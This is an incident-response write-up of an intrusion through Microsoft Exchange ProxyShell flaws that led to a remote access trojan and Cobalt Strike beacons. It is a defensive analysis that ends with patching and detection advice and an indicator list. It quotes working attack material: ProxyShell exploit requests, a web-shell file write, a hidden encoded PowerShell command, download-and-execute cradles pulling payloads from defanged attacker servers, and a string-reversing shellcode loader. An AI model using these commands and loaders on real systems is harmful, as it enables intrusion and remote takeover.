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A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike

Published 9/21/21, 9:00am


In many instances, threat actors are paying just as much attention to public vulnerability disclosures as the blue team. In some cases, they are paying even more attention to them, especially when proof-of-concept code is released for successful exploitation. This often results in fast turnaround of intrusion capabilities that can be leveraged to obtain access to an unsuspecting network. Such is the case with the Microsoft Exchange ProxyShell vulnerabilities.

The GuidePoint DFIR team was engaged to respond to alerts of Cobalt Strike being detected on an on-premises Microsoft Exchange server and other Windows servers in an environment. Throughout the course of our investigation, we were able to eradicate all threat actor presence and Cobalt Strike Beacons and confirm that ProxyShell vulnerabilities were used as the initial intrusion vector that resulted in the execution of a remote access trojan on the compromised Exchange server. Additionally, we found evidence of tools and tactics being used that share a high degree of similarity with the recent Conti affiliate playbooks leak.

Exploiting ProxyShell to Execute PowerShell

Late in August, Microsoft announced the existence of CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, and with their powers combined, they are ProxyShell. These vulnerabilities, documented very thoroughly by FireEye, leverage pre-auth path confusion for ACL bypass, elevation of privilege on the Exchange PowerShell backend, and post-auth arbitrary file writes to install a web shell onto the compromised system.

In this incident, we observed the following attack chain that successfully exploited ProxyShell vulnerabilities on the compromised Exchange server. This exploitation led to a subsequent PowerShell execution that resulted in further malware being executed on the system.

Located below are the relevant log entries depicting ProxyShell exploitation:

Pre-Auth Path Confusion ACL Bypass (CVE-2021-34473)
2021-08-21 06:45:00

POST /autodiscover/autodiscover.json @evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%[email protected]&CorrelationID=<empty>;&cafeReqId=93a8d925-536f-4b92-821b-d8c7a4147022; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 75

Elevation of Privilege using Exchange PowerShell Backend (CVE-2021-34523)
2021-08-21 06:45:01

POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-
CAT=<redacted>&Email=autodiscover/autodiscover.json%[email protected]
1bedf67e796c; 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 -
200 0 0 98

RCE via Post-Auth Arbitrary File Write
2021-08-21 06:45:01

New-MailboxExportRequest -Mailbox <redacted> -IncludeFolders "#Drafts#" -ContentFilter “Subject -eq 'frhnc'” -ExcludeDumpster True -FilePath "\\\c$\inetpub\wwwroot\aspnet_client\jotzv.aspx”

Web Shell Invocation
2021-08-21 06:45:01

POST /aspnet_client/jotzv.aspx - 443 – 139[.]28[.]235[.]7 python-requests/2.26.0 - 200 0 0 691

Web Shell Command Executed
2021-08-21 06:45:01

powershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGM

IEX (New-Object Net.Webclient).downloadstring(“hxxp://45[.]32[.]229[.]66/run.txt”)

Download, Download, Download, RAT!

The PowerShell execution mechanism was interesting because it downloaded several payloads from multiple locations before achieving its final goal of executing a RAT in memory on the compromised exchange server.

Figure 1: Download and Execution Mechanism

When the initial obfuscated PowerShell command is executed, it first retrieves additional commands from hxxp://45[.]32[.]229[.]66/run.txt. We retrieved the payload from the command and control server and observed the following command contents:

$path = $Env:temp+'\komar.ps1';
$client = New-Object System.Net.WebClient;
$client.downloadfile('hxxp://45[.]32[.]229[.]66/komar.ps1',$path); C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -executionpolicy bypass -file $path

By executing this series of PowerShell commands on the compromised Exchange server, the threat actor downloaded another payload from the same command and control server, saved the PowerShell script payload to $ENV:temp\komar.ps1, and then executed the PowerShell script from a newly created 32-bit PowerShell process.

The contents of komar.ps1 are ultimately responsible for decoding an obfuscated payload, loading into memory, and executing it using a newly created thread. The obfuscation method, outlined below, is straightforward and uses a simple, but effective, method that leverages RegEx to read strings backwards and concatenate them together.

$oaMNWBoiPsrJXPvIQjolY = (([regex]::Matches('<redacted for brevity> ','.','RightToLeft') | ForEach {$_.value}) -join '')

$lKasviAMAEPbJhgGKKIld = (([regex]::Matches('<redacted for brevity> ','.','RightToLeft') | ForEach {$_.value}) -join '')

[Byte[]]$JTpvAKubThgBlDnqojikG = [System.Convert]::FromBase64String((-join($oaMNWBoiPsrJXPvIQjolY,$lKasviAMAEPbJhgGKKIld)))

The resultant value of $JTpvAKubThgBlDnqojikG (the final payload) is shellcode that is loaded into memory and executed. Using SpeakEasy, we were able to emulate the shellcode and obtain details on its functionality.

0x1035: 'kernel32.VirtualAlloc(0x0, 0x20000, 0x3000, "PAGE_EXECUTE_READWRITE")' -> 0x50000
0x15c1: 'kernel32.LoadLibraryA("wininet.dll")' -> 0x7bc00000
0x1613: 'kernel32.GetProcAddress(0x7bc00000, "InternetOpenA")' -> 0xfeee0000
0x1655: 'kernel32.GetProcAddress(0x7bc00000, "InternetOpenUrlA")' -> 0xfeee0001
0x1697: 'kernel32.GetProcAddress(0x7bc00000, "InternetReadFile")' -> 0xfeee0002
0x16d9: 'kernel32.GetProcAddress(0x7bc00000, "InternetCloseHandle")' -> 0xfeee0003
0x16e9: 'wininet.InternetOpenA(0x0, 0x0, 0x0, 0x0, 0x0)' -> 0x20
0x1702: 'wininet.InternetOpenUrlA(0x20, "hxxp://108[.]62[.]12[.]122/Agent32.bin", 0x0, 0x0, "INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_RELOAD", 0x0)' -> 0x28
0x1730: 'wininet.InternetReadFile(0x28, 0x50000, 0x20000, 0x1203f84)' -> 0x1
0x1737: 'wininet.InternetCloseHandle(0x28)' -> 0x1 0x173e: 'wininet.InternetCloseHandle(0x20)' -> 0x1

The emulated shellcode indicates that there is yet another downloaded payload that is obtained from a second command and control server. The payload is also loaded into memory and executed on the compromised system.

We retrieved Agent32.bin from the command and control server and conducted a thorough analysis of its capabilities. Initially, an embedded PE is unpacked into memory and execution is transferred to the newly unpacked executable. The malware then collects the following information from the compromised system and sends it to the command and control server:

  • System Name
  • User (including domain)
  • Volumes information
  • Process ID and name
  • Network interface IP addresses
  • System version information

The compromised system information is then encrypted and sent to the command and control server via an HTTP POST request.

Figure 2: HTTP POST Request to Command and Control

As we dug deeper into the capabilities of this malware, we determined that its intended purpose as to provide remote access trojan (RAT) capabilities via commands received from the command and control server. Specifically, this RAT has the following capabilities:

  • Process injection into cmd.exe or svchost.exe
  • File read, write, and delete
  • Named pipe reads and writes
  • Script/Command execution via cmd.exe or PowerShell
  • Creation of new processes to spawn malware executables
  • DLL execution via Rundll32

In this case, this RAT was confirmed as being used to invoke Cobalt Strike on the compromised Exchange server.

Beacons, Beacons Everywhere

When Cobalt Strike is discovered in an environment, it is common to obtain different beacon configurations associated with different team servers. It is also common to find Cobalt Strike beacons on multiple systems within the compromised environment. In this incident, we discovered Cobalt Strike beacons on 15 critical infrastructure servers with four different beacon configurations defining four different team server IP addresses.

Three of the beacons were using no malleable C2 profiles or very commonly observed malleable C2 profiles, however, one beacon was using a malleable C2 profile that is less common and masquerades as being associated with Imperva. A snippet from the beacon configuration associated with that malleable C2 profile is located below:

Figure 3: Snippet of Cobalt Strike Beacon

Similarities with Conti’s Tactics and Toolsets

In early August 2021, a disgruntled Conti affiliate leaked Conti’s playbooks and toolsets on the underground forum XSS. In addition to Cobalt Strike being heavily utilized during this incident, which is heavily used by Conti and other ransomware groups, the following tools were identified within the environment:

Tool NameDescription
removesophos.batSophos anti-virus removal utility
uninstallSophos.batSophos anti-virus removal utility
rclone.exeData syncing utility commonly used for exfiltration
Table 1: Observed Tools Sharing Similarities with Conti’s Tactics and Toolsets

We are unable to confirm whether this activity was related to Conti or one of its affiliates without the presence of encrypted files or ransom notes. That being said, the release of Conti’s playbooks was a double-edged sword. We received key insights into the group’s tactics and toolsets, however, now that those playbooks are public, other threat actors are now free to use those playbooks for their own benefit.


This attack originated from the exploitation of ProxyShell, a critical vulnerability in the Microsoft Exchange platform, which resulted in the deployment of Cobalt Strike. Cobalt Strike continues to be sighted in a high volume of incidents and will likely continue to be one of the post-exploitation tools of choice for threat actors due to its extreme flexibility and effective nature. With that in mind, here are some recommendations for mitigating the risk associated with ProxyShell and proactively detecting Cobalt Strike and other threats within your environment:

  • Update your Microsoft Exchange Server to the most recent version to mitigate the effects of CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.
  • Ensure that EDR and other behavioral detection mechanisms are enabled and being actively reviewed in the environment.
    • Implement detections for suspicious and malicious behaviors including rundll32, regsvr32, or other native Windows processes making connections to external IP addresses.
    • Review all & baseline Powershell executions for anomalies.
    • Review 7045 events for new Service Creations
  • Increase Windows event logging to ensure that critical events are captured and alerted on if possible. Sysmon is a great choice for this type of logging.
  • Actively perform threat hunting in your environment and incorporate threat intelligence into your hunting activities.


This incident started as so many others do, with Cobalt Strike alerts and the discovery of easily exploited vulnerabilities. This scenario demonstrates the importance of vulnerability management and patching, proactive and layered detection capabilities, and diligent response.

Although ProxyShell was successfully exploited and Cobalt Strike was prevalent in the environment, the impacted organization was able to detect malicious activity early enough to begin incident response, eradicate the threat actor from their network, and prevent a likely ransomware attack.

Indicators of Compromise (IOCs)

C:\Windows\Temp\n88.dllFilenameCobalt Strike Stager
c:\windows\temp\komar.ps1FilenameMalicious PowerShell
Script – Downloader for
c:\windows\temp\79-220.dllFilenameCobalt Strike Stager
removesophos.batFilenameSophos anti-virus
removal utility
uninstallSophos.batFilenameSophos anti-virus
removal utility
rclone.exeFilenameData syncing utility
commonly used for
37[.]221[.]115[.]68IPv4 AddressCobalt Strike Team Server
45[.]32[.]229[.]66IPv4 AddressServer Hosting Payloads
216[.]250[.]248[.]88IPv4 AddressCobalt Strike Team Sever
108[.]62[.]12[.]122IPv4 AddressServer Hosting Payloads
185[.]153[.]199[.]164IPv4 AddressCobalt Strike Team Server
139[.]28[.]235[.]7IPv4 AddressIP Address Used for Initial
ProxyShell Exploitation
MD5Cobalt Strike Stager
MD5Cobalt Strike Stager
MD5Cobalt Strike Stager
SHA1Cobalt Strike Stager
SHA1Cobalt Strike Stager
SHA1Cobalt Strike Stager
SHA256Cobalt Strike Stager
SHA256Cobalt Strike Stager
hxxp:// Strike Beacon
hxxp:// Strike Beacon
hxxp:// Strike Beacon
hxxp:// Strike Beacon
hxxp:// Strike Beacon
hxxp:// PowerShell
Script – Downloader for
hxxp://79[.]141[.]169[.]220/bSVQURLCobalt Strike Stager
Target (Beacon Download)
hxxp://79[.]141[.]169[.]220/dpixelURLCobalt Strike Beacon
hxxp://79[.]141[.]169[.]220/OKaaURLCobalt Strike Stager Target
(Beacon Download)
URLCobalt Strike Beacon
URLCobalt Strike Beacon
hxxps://37[.]221[.]115[.]68/msURLCobalt Strike Beacon
Mozilla/5.0 (Linux; Android 8.0.0;
SM-G960F Build/R16NW)
AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/62.0.3202
User-AgentCobalt Strike Beacon